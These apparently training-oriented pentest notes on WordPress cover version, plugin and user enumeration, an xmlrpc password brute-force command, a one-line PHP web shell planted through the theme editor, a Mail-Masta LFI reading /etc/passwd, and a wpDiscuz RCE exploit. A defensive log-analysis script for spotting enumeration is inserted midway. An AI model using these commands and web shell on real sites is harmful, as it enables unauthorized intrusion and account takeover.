# WordPress

<table><thead><tr><th width="178">User Role</th><th>Description</th></tr></thead><tbody><tr><td>Administrator</td><td>Full privileges. This role is an interesting target because it can manage plugins.</td></tr><tr><td>Editor</td><td>Can publish and manage any user's posts. This role is an interesting target because it can manage plugins.</td></tr><tr><td>Author</td><td>Can publish and manage their own posts.</td></tr><tr><td>Contributor</td><td>Can write and manage their own posts, but cannot publish them.</td></tr><tr><td>Subscriber</td><td>Can view posts and manage/modify their own profile.</td></tr></tbody></table>

Getting access to an administrator account is usually sufficient to obtain code execution on the server.\
Editors and authors might have access to certain vulnerable plugins that normal users do not.

***

## **WordPress Discovery/Footprinting**

**Manual Identification:**

* Check if the `robots.txt` file contains any WordPress-related entry
* Check if `/wp-admin`, `/wp-content`, `xmlrpc.php` or other WordPress-related artifacts exist.
* Search the WP version inside the page source code:\
  `curl example.com | grep '<meta name="generator"'`
* Search the WP version inside the `css` or `js` files:\
  `curl example.com | grep '?ver='`
* Find the version inside `readme.html` (only works on old WordPress versions)

Identification using WPScan:

* `wpscan --url example.com --enumerate --api-token TOKENVALUE`

Plugins Enumeration:

* `curl -s -X GET https://example.com | sed 's/href=/\n/g' | sed 's/src=/\n/g' | grep 'wp-content/plugins/*' | cut -d"'" -f2`
* You can also check whether a plugin is installed by requesting the plugin's directory without the trailing `/` and observing whether the web application redirects to the complete folder (via a 3XX redirect):\
  `curl -I -X GET http://example.com/wp-content/plugins/mail-masta` <- note the missing trailing `/`
* If the application answers with a 3XX redirect, the plugin exists. If it answers with a 404, it does not.

{% hint style="info" %}
This technique finds installed plugins even when they are deactivated.
{% endhint %}

Themes Enumeration:

* `curl -s -X GET https://example.com | sed 's/href=/\n/g' | sed 's/src=/\n/g' | grep 'themes' | cut -d"'" -f2`

***

## **User Enumeration**

Some versions of the WordPress login form allow enumerating usernames because verbose error messages state whether a username exists.

Alternative methods are:

1. Use the `?author=` GET parameter to check whether the page redirects you to a valid user's page:\
   `curl -s -I http://example.com/?author=1`
2. List usernames through the `wp-json` users REST endpoint:\
   `curl http://example.com/wp-json/wp/v2/users | jq`

Once you have found a valid username, you can use `wpscan` to brute-force that user's password (usernames passed to `-U` are comma-separated, without spaces):\
`sudo wpscan --password-attack xmlrpc -t 20 -U admin,sfoffo -P /usr/share/wordlists/rockyou.txt --url https://example.com`

{% hint style="danger" %}
Some WordPress instances may lock out a user after a few invalid attempts.
{% endhint %}
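The plugin-directory redirect check and the `?author=` / `wp-json` user listing described above leave a recognisable footprint in the web server's access log. The following is an added detection example, not part of the original notes: it parses constructed combined-format log lines (the IPs, timestamps and thresholds are assumptions) and flags source addresses whose request pattern matches those enumeration techniques.

```python
import re
from collections import defaultdict

# Combined log format: client IP, request line, status code (other fields ignored).
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<path>\S+) [^"]*" (?P<status>\d{3})')
PLUGIN_DIR_RE = re.compile(r"^/wp-content/plugins/([^/?]+)$")   # plugin dir requested without trailing slash
AUTHOR_RE = re.compile(r"^/\?author=\d+$")                      # ?author=N redirect-based enumeration
USERS_ENDPOINT = "/wp-json/wp/v2/users"                         # REST endpoint that lists authors

# Constructed sample lines (not real traffic): 203.0.113.10 probes, 198.51.100.7 browses normally.
SAMPLE_LOG = """\
203.0.113.10 - - [01/Jan/2024:10:00:01 +0000] "HEAD /wp-content/plugins/mail-masta HTTP/1.1" 301 0
203.0.113.10 - - [01/Jan/2024:10:00:02 +0000] "HEAD /wp-content/plugins/akismet HTTP/1.1" 404 196
203.0.113.10 - - [01/Jan/2024:10:00:03 +0000] "HEAD /wp-content/plugins/wpdiscuz HTTP/1.1" 404 196
203.0.113.10 - - [01/Jan/2024:10:00:05 +0000] "HEAD /?author=1 HTTP/1.1" 301 0
203.0.113.10 - - [01/Jan/2024:10:00:06 +0000] "HEAD /?author=2 HTTP/1.1" 301 0
203.0.113.10 - - [01/Jan/2024:10:00:07 +0000] "HEAD /?author=3 HTTP/1.1" 404 196
203.0.113.10 - - [01/Jan/2024:10:00:08 +0000] "GET /wp-json/wp/v2/users HTTP/1.1" 200 1421
198.51.100.7 - - [01/Jan/2024:10:01:00 +0000] "GET /wp-content/plugins/mail-masta/style.css HTTP/1.1" 200 812
198.51.100.7 - - [01/Jan/2024:10:01:01 +0000] "GET /?author=1 HTTP/1.1" 301 0
"""

def analyze(log_text, plugin_threshold=3, author_threshold=3):
    """Return {ip: {"reasons": [...], "plugins_confirmed": [...]}} for IPs crossing a threshold."""
    stats = defaultdict(lambda: {"plugin": 0, "author": 0, "users": 0, "confirmed": []})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                      # skip malformed lines instead of crashing
        s, path, status = stats[m["ip"]], m["path"], int(m["status"])
        plugin = PLUGIN_DIR_RE.match(path)
        if plugin:
            s["plugin"] += 1
            if 300 <= status < 400:       # redirect to "<dir>/" means the plugin is installed
                s["confirmed"].append(plugin.group(1))
        elif AUTHOR_RE.match(path):
            s["author"] += 1
        elif path.split("?")[0] == USERS_ENDPOINT:
            s["users"] += 1
    alerts = {}
    for ip, s in stats.items():
        reasons = []
        if s["plugin"] >= plugin_threshold:
            reasons.append("plugin directory probing")
        if s["author"] >= author_threshold:
            reasons.append("author id enumeration")
        if s["users"]:
            reasons.append("REST users endpoint listed")
        if reasons:
            alerts[ip] = {"reasons": reasons, "plugins_confirmed": s["confirmed"]}
    return alerts
```

The `plugins_confirmed` list tells the defender which plugin directories answered with a redirect, i.e. which plugins the probing client has now confirmed as installed.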

***

## **Admin User - Remote Code Execution**

> An administrator account may edit PHP code in order to gain RCE.\
> Note: when editing an active theme or plugin you may encounter errors. Deactivate them first.

**The steps are the following:**

* **Semi-automatically, using `msfconsole`**:\
  `use exploit/unix/webapp/wp_admin_shell_upload`
* **Manually, by modifying a theme:**
  1. Log in as administrator.\
     Navigate to: appearance → side panel → theme editor → select a theme
  2. Add the following to the theme: `system($_GET[0]);`
  3. Use the following URL to gain RCE: `http://example.test/wp-content/themes/THEMENAME/FILEPHPNAME.PHP?0=id`

***

## **WordPress Known Vulnerable Plugins**

1. **`Mail-Masta` allows LFI by using the following PoC:** `curl -s http://blog.inlanefreight.local/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd`
2. `wpDiscuz` allows RCE by using the following PoC:
   * [ExploitDB](https://www.exploit-db.com/exploits/49967): `python3 wp_discuz.py -u http://blog.inlanefreight.local -p /?p=1`
   * If it fails, use `cURL` to execute commands through the uploaded web shell: `curl -s http://blog.inlanefreight.local/wp-content/uploads/2021/08/uthsdkbywoxeebg-1629904090.8191.php?cmd=id`
